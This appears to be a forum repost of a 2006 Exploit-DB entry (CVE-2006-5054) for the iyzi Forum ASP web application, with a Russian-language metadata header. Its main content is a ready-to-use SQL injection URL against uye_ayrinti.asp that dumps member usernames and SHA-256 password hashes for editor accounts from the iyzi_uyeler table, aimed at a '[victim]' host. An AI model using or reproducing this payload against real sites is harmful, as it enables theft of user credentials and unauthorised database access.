- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2423
- Проверка EDB
-
- Пройдено
- Автор
- FIX TR
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2006-5054
- Дата публикации
- 2006-09-24
Код:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Download & Info: http://www.aspindir.com/Goster/2981
Bug In : uye_ayrinti.asp
Risk : High
Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1
Password encrytped with SHA-256
# milw0rm.com [2006-09-24]- Источник
- www.exploit-db.com
